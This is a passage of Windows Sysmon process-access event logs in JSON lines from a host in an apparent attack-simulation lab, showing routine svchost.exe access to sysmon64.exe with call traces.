Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 